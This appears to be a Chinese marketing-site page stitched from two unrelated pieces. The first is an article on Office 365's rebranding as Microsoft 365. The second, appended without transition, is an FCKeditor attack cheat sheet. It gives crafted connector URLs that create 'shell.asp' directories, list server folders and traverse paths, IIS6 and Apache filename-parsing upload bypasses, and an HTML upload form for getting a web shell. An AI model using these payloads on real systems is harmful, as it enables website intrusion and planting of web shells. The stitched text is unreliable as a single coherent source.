整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
020年4月22日開始,微軟的Office 365升級為Microsoft 365,發布于2011年6月份的微軟云辦公應用華麗轉身,而這一切其實在6年前就注定了。
2014年2月4日,微軟宣布薩提亞·納德拉出任CEO,這是微軟歷史上第三位CEO,此前他是微軟的云計算部門副總裁,這也是微軟董事會最看重的地方之一。
上任之后他帶領微軟全球業務轉型,錯失搜索、移動市場的微軟不再強求這兩個市場,云計算成為新任CEO選擇的三個發展方向之一,不只是Windows系統,Office這樣的主力軟件“云”含量不斷提升,直到Microsoft 365全面云化。
2020年正好是Windows版Office問世30年,中國古人常說“三十而立”,微軟顯然也是想讓30歲的Office成家立業,進而開枝散葉,不再作為Windows系統的附庸。
從打字到辦公必備 Windows版Office問世30年
微軟Office的前身在1980年代就有了,那時候還是Mac和DOS的時代,1985年Office首先出現在Mac平臺上,而大家熟悉的Office軟件通常是指Windows版Office,1990年11月19日正式推出Office 1.0,那時候還是Windows 2.0時代。
Office 1.0安裝界面
Office 1.0一開始就是Word、Excel、PPT三劍客的集成,這個模式幾乎貫穿Office整個歷史,到現在也沒變過,這三個軟件是Office最重要的部分。
不過從功能上來看,早期的Office主要作用就是文字編輯,最多再加上表格處理,那時候功能還是比較簡單的,遠沒有現在這么復雜。
從1990年的Office 1.0到最新的Office 2019,Office的辦公軟件屬性都沒太大變化,功能及性能當然是越來越強了,其中國人最熟悉的大概是Office 2003了,這與當年Ghost版WinXP在國內的普及有關,WinXP+Office 2003幾乎是當時的標配。
Office 2003之后的版本中,Office 2007重做了UI界面,微軟引入了Office Fluent功能區,提供了大量常用操作命令,使得Office辦公效率大漲。
之后的Office 2010中,也就是在2009年的Win7系統同時,它也開始提供網頁版功能,這是Office辦公軟件變革的開始,從單機向網絡協同的方向走了。
之后的Office 2013中,正式開始跟Office 365走到一起,增加了OneDrive網盤,全新的Metro界面更符合平板、手機等移動設備習慣,并支持跨平臺的同步。
最新的兩版Office就是Office 2016及Office 2019了,繼續優化UI界面,其中Word/Excel/PPT三劍客中增加了不少有用的新功能,比如3D模型插入、漏斗圖、多條件函數、全新閱讀模式、學習工具、語音朗讀等,用起來更方便。
微軟開辟分支路線:2011年Office 365開始云端化
Office軟件前面20年的發展中,基本都是以本地軟件出現的,而且與Windows系統的發布密切相關,二者差不多是同代升級,這個階段也像是游戲發展的單機一樣,玩家的工作就像是單機打怪升級。
單機的發展是網游,Office軟件也是如此,差不多是在Office 2013發展的同時,微軟給Office軟件開了一條支線任務——2011年6月份推出了Office 365,將本地的Office軟件推向了云端。
Office 365里面的軟件包括Word、Excel、Power Point、Outlook、OneNote、Access以及Publisher等等,甚至比本地版Office更多一些,家庭及辦公常用的應用幾乎都包括進去了。
同時,Office 365還捆綁了微軟的OneDrive網盤,可以同步文件資料,不同電腦中使用時可以確保文件是最新的,避免了本地丟失或者不同步等難題。
全面云化之后,用戶也不需要關心Office全家桶軟件的版本問題,不像之前那樣升級一代需要買一代,Office 365會自動更新軟件,確保軟件都是最新的,在不同平臺上使用體驗都是一致的,同時安全性也是最高的,不需要用戶手動手機補丁。
最后,Office 365的收費機制也不同了,此前的Office是綁定本機的,一次性買斷使用,換平臺就很麻煩,而Office 365是訂閱制,一年支付一次,有個人版、家庭版、教育版及商業版多種選擇。
與一次性購買全套Office動輒上千元的價格相比,Office 365的價格也便宜了很多,個人版正常售價是398元一年。
如果是多人應用,家庭版498元一年,支持6個人使用,攤薄下來每年的使用費用便宜多了,大大節省了消費者的開支。
Office 365升級Microsoft 365:籌謀三年 微軟全面云化
在即將問世十周年的時候,微軟的Office 365在4月21日功成身退,被Microsoft 365取代,后者是微軟的最新服務,其實它早在2017年就已經推出了,在替代Office 365這條路上籌備了三年多。
2018年7月份,Microsoft 365上線時,微軟副總裁Kirk Koenigsbauer親自撰文介紹這一創新,宣布Microsoft 365整合了Office 365、Windows 10及企業級移動、安全能力,這套完整而且安全的智慧型解決方案將協助提升員工能力。
Microsoft 365首先是Office 365的超集,后者的功能如桌面Office、1TB OneDrive網盤、安全更新、技術支持都包含在了Microsoft 365之中,而且這次替換是加量不加價,訂閱費用并沒有變化,個人版 398、6人使用的家庭版498元。
在原有的功能之外,Microsoft 365還加入了一些新功能,特別是與協同辦公、AI人工智能、版權資源相關的,主要是:
1、在 Office、OneDrive、Outlook 之外加入Family Safety 和Teams 程序,預覽版本預計將于今年推出;
2、加入更多 AI 支持的新功能,比如微軟編輯器(Microsoft Editor),為消費者在輸入時提供拼寫和語法糾錯,提供書寫建議讓表達變得簡單易懂。
3、向訂閱用戶提供了300+高級模板,Getty Images上8000多張精美圖片和175個循環視頻,以及300種新字體和2800個新圖標的獨家使用權限,助您創造出更具影響力和視覺吸引力的文檔。這些資源同時也可以在Word和Excel中使用。
同時,在中國市場上,Microsoft 365還繼續堅持了本地化策略,比如Office 365微助理,它整合了國人更常用的QQ、微信兩大IM應用,還推出了可免費使用半年的Teams遠程視頻應用,在疫情期間用戶數增債500%。
總之,在Microsoft 365上,微軟這次取代Office 365的動作及時機都很完美,在當前需要大量遠程工作的契機下,Microsoft 365憑借更豐富的功能、更安全的連接、更智能的AI、更便捷的遠程協作成功上位,完美取代了Office 365,提高了生產效率。
納德拉的云端戰略初見成效 Microsoft 365水到渠成
在納德拉擔任CEO的六年里,微軟從搜索、移動業務的失利陰影中成功走了出來,斷舍離之后在云計算市場上找到了方向,Office 365相關的業務貢獻頗多。今年1月底發布的財報中,Office 365企業級業務營收增長27%,消費級增長19%,Office 365訂閱數達到了3720萬。
2014年擔任CEO之后的第一封公開信中,納德拉指出微軟早期的使命是讓PC進入每一個桌面和家庭中,目前在發達國家基本實現了這一目標。
在未來,微軟的工作不再是普及PC,而是幫助世界上更多的人去完成工作、娛樂甚至通信,而Microsoft 365取代Office 365是微軟戰略中的一步,現在來看這一步已經初見成效了,后續的發展當是水到渠成。
jango
FCKeditor/_samples/default.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.htmlFCKeditor/_whatsnew.htmlFCKeditor/editor/filemanager/browser/default/connectors/php/config.php影響版本:非優化/精簡版本的FCKeditor
脆弱描述:
如果存在以下文件,打開后即可上傳文件。
攻擊利用:
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.htmlFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML頁面中第二行 url=/xxx的部分就是默認基準上傳路徑
Note:
[Hell1]截至2010年02月15日最新版本為FCKeditor v2.6.6
[Hell2]記得修改其中兩處asp為FCKeditor實際使用的腳本語言
影響版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:FCKeditor v2.4.3中File類別默認拒絕上傳類型
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2
允許上傳asa、cer、php2、php4、inc、pwml、pht后綴的文件
上傳后 它保存的文件直接用的
$sFilePath = $sServerDir . $sFileName而沒有使用$sExtension為后綴。直接導致在win下在上傳文件后面加個.來突破[未測試]。而在apache下,因為”Apache文件名解析缺陷漏洞”也可以利用
附:
測試環境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
1.國外(SSR TEAM)發了多個advisory稱Apache’s MIME module (mod_mime)相關漏洞,就是attack.php.rar會被當做php文件執行的漏洞,包括Discuz!那個p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
2.S4T的superhei在blog上發布了這個apache的小特性,即apache 是從后面開始檢查后綴,按最后一個合法后綴執行。其實只要看一下apache的htdocs那些默認安裝的index.XX文件就明白了。
3.可以充分利用在上傳漏洞上,列舉如下
影響版本
安裝了iis6的服務器(windows2003),受影響的文件名后綴有.asp .asa .cdx .cer .pl .php .cgi
脆弱描述:
利用2003系統路徑解析漏洞的原理,創建類似bin.asp如此一般的目錄,再在此目錄中上傳文件即可被腳本解釋器以相應腳本權限執行。
攻擊利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp強制建立shell.asp目錄:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684或者
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp影響版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在處理文件上傳時存在輸入驗證錯誤,遠程攻擊可以利用此漏洞上傳任意文件。
在通過editor/filemanager/upload/php/upload.php上傳文件時攻擊者可以通過為Type參數定義無效的值導致上傳任意腳本。
成功攻擊要求config.php配置文件中啟用文件上傳,而默認是禁用的。攻擊利用:
<form id="frmUpload" enctype="multipart/form-data"
action="http://****XXXX/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>PS:如想嘗試v2.2版漏洞,則修改Type=任意值 即可,但注意,如果換回使用Media則必須大寫首字母M,否則LINUX下,FCKeditor會對文件目錄進行文件名校驗,不會上傳成功的。
影響版本:aspx版FCKeditor
攻擊利用:
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.asp影響版本: FCKeditor => 2.4.x
脆弱描述:
我們上傳的文件例如:shell.php.rar或shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化。
攻擊利用:
提交1.php+空格 繞過
ps:※空格只支持win系統
unix是不支持的[1.php和1.php+空格是2個不同的文件]
影響版本:=>2.4.x的最新版已修補
來源:T00LS.Net大佬的解釋
由于Fckeditor對第一次上傳123.asp;123.jpg 這樣的格式做了過濾。也就是IIS6解析漏洞。
上傳第一次。被過濾為123_asp;123.jpg 從而無法運行。
但是第2次上傳同名文件123.asp;123.jpg后。由于”123_asp;123.jpg”已經存在。
文件名被命名為123.asp;123(1).jpg …… 123.asp;123(2).jpg這樣的編號方式。
所以。IIS6的漏洞繼續執行了。
如果通過上面的步驟進行測試沒有成功,可能有以下幾方面的原因:
1.FCKeditor沒有開啟文件上傳功能,這項功能在安裝FCKeditor時默認是關閉的。如果想上傳文件,FCKeditor會給出錯誤提示。
2.網站采用了精簡版的FCKeditor,精簡版的FCKeditor很多功能丟失,包括文件上傳功能。
3.FCKeditor的這個漏洞已經被修復。
影響版本:Aspx與JSP版FCKeditor
脆弱描述:Getshell請參考“TYPE自定義變量任意上傳文件漏洞”
攻擊利用:
修改CurrentFolder參數使用 …/…/來進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp根據返回的XML信息可以查看網站所有的目錄
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F鏈接上一段
影響版本: 較早版本
脆弱描述:
通過自定義Type變量的參數,可以創建或上傳文件到指定的目錄中去,且沒有上傳文件格式的限制。
攻擊利用:
直接修改上傳類型參數 直接上傳 getshell
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打開這個地址就可以上傳任何類型的文件了,Shell上傳到的默認位置是:
http://XXXXX/UserFiles/all/1.asp解釋: Type=all 這個變量是自定義的,在這里創建了all這個目錄,而且新的目錄沒有上傳文件格式的限制.
例如:
網馬就可以傳到網站的根目錄下.
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp如找不到默認上傳文件夾可檢查此文件:
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
